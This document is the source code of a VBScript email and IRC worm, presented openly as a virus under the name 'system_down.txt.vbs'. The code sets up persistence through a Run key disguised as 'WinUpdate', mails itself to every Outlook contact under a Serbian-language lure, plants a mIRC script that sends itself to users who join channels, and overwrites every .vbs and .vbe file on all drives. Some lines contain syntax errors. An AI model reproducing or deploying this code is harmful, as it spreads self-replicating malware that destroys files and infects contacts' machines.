Virus system_down.txt.vbs

######### virus ############################################
'Virus system_down.txt.vbs
Set HFFLUN1U = createobject("scripting.filesystemobject")
HQO5518H = HFFLUN1U.getspecialfolder(1)
R125B3VC = HQO5518H & "\volim_te.txt.vbs"
Set SO2ERHGU = createobject("wscript.shell")
SO2ERHGU.regwrite "HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R125B3VC & " %"
HFFLUN1U.copyfile wscript.scriptfullname, R125B3VC
O8UN6TKP
If SO2ERHGU.regread("HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\system_down.txt.vbs\P6OIH928") <> 1 then
EU3V0765
End if
If SO2ERHGU.regread("HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\system_down.txt.vbs\T7UT8582") <> 1 then
EJSL7CBE ""
End if

Set M79N43AH= HFFLUN1U.opentextfile(wscript.scriptfullname)
IC4FESF6 = M79N43AH.readall
M79N43AH.close
Do
if not(HFFLUN1U.fileexists(wscript.scriptfullname)) then
set I1JH1J72= HFFLUN1U.createtextfile(wscript.scriptfullname)
I1JH1J72.write IC4FESF6
I1JH1J72.close
end if
UDT5953N = SO2ERHGU.regread("HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\Run\WinUpdate")
If UDT5953N <> "wscript.exe " & R125B3VC & " %" then
SO2ERHGU.regwrite "HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R125B3VC & " %"
end if
UDT5953N= ""
loop
Function EU3V0765()
Set GJ7P4911 = CreateObject("Outlook.Application")
If GJ7P4911 = "Outlook" Then
Set KECO30GA = GJ7P4911.GetNameSpace("MAPI")
Set L219C6V2 = KECO30GA.AddressLists
For Each H82H7563 In L219C6V2
If H82H7563.AddressEntries.Count <> 0 Then
A5II2553 = H82H7563.AddressEntries.Count
For S8JO7233 = 1 To A5II2553
Set K7623MOJ = GJ7P4911.CreateItem(0)
Set H541TU1Q = H82H7563.AddressEntries(S8JO7233)
K7623MOJ.To = H541TU1Q.Address
K7623MOJ.Subject = "cao"
K7623MOJ.Body = "Cao, " & vbcrlf & "nadam se da ces ovo procitati i" & vbcrlf & "da ces razumeti..." & vbcrlf & ""
execute "set ISHK15M5 =K7623MOJ." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
UVSBA4Q2 = R125B3VC
K7623MOJ.DeleteAfterSubmit = True
ISHK15M5.Add UVSBA4Q2
If K7623MOJ.To <> "" Then
K7623MOJ.Send
End If
Next
End If
Next
End If
End function
Function EJSL7CBE(N46SM3R1)
If N46SM3R1 <> "" Then
RH5KFA0D = SO2ERHGU.regread("HKEY_LOCAL_MACHINE\Software\Mcft\Windows\CurrentVersion\ProgramFilesDir")
If HFFLUN1U.fileexists("c:\mirc\mirc.ini") Then
N46SM3R1 = "c:\mirc"
ElseIf HFFLUN1U.fileexists("c:\mirc32\mirc.ini") Then
N46SM3R1 = "c:\mirc32"
ElseIf HFFLUN1U.fileexists(RH5KFA0D & "\mirc\mirc.ini") Then
N46SM3R1 = RH5KFA0D & "\mirc"
ElseIf HFFLUN1U.fileexists(RH5KFA0D & "\mirc32\mirc.ini") Then
N46SM3R1 = RH5KFA0D & "\mirc"
Else
N46SM3R1 = ""
End If
End If
If N46SM3R1 <> "" Then
Set C1JLJ66F = HFFLUN1U.CreateTextFile(N46SM3R1 & "\script.ini", True)
C1JLJ66F = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
C1JLJ66F = C1JLJ66F & vbCrLf & "n0=on 1:JOIN:#:{"
C1JLJ66F = C1JLJ66F & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
C1JLJ66F = C1JLJ66F & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
C1JLJ66F = C1JLJ66F & R125B3VC
C1JLJ66F = C1JLJ66F & vbCrLf & "n3=}"
script.Close
End If
End Function
Function VB17JIJS()
On Error Resume Next
Set HVNE84R3 = HFFLUN1U.Drives
For Each SPBC4Q28 In HVNE84R3
KA61L0PN = SPBC4Q28 & " \ "
Call I1HE2CE2(KA61L0PN)
Next
End Function

Function I1HE2CE2(P8HO634G)
FD6T6S1N = P8HO634G
Set F54HU6J5 = HFFLUN1U.GetFolder(FD6T6S1N)
Set KS2NN47N = F54HU6J5.Files
For Each S9C7C2GI In KS2NN47N
If lcase(S9C7C2GI.Name) = "mirc.ini" Then
EJSL7CBE(S9C7C2GI.ParentFolder)
End If
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = "vbs"
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = "vbe"
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
Next
Set P67O4ULQ = F54HU6J5.Subfolders
For Each PR35UKR1 In P67O4ULQ
Call (PR35UKR1.path)
Next
End function
Function O8UN6TKP()
SO2ERHGU.regwrite "HKEY_LOCAL_MACHINE\Software\Mcft\Windows\CurrentVersion\RegisteredOwner","IMAS_VIRUS"
end function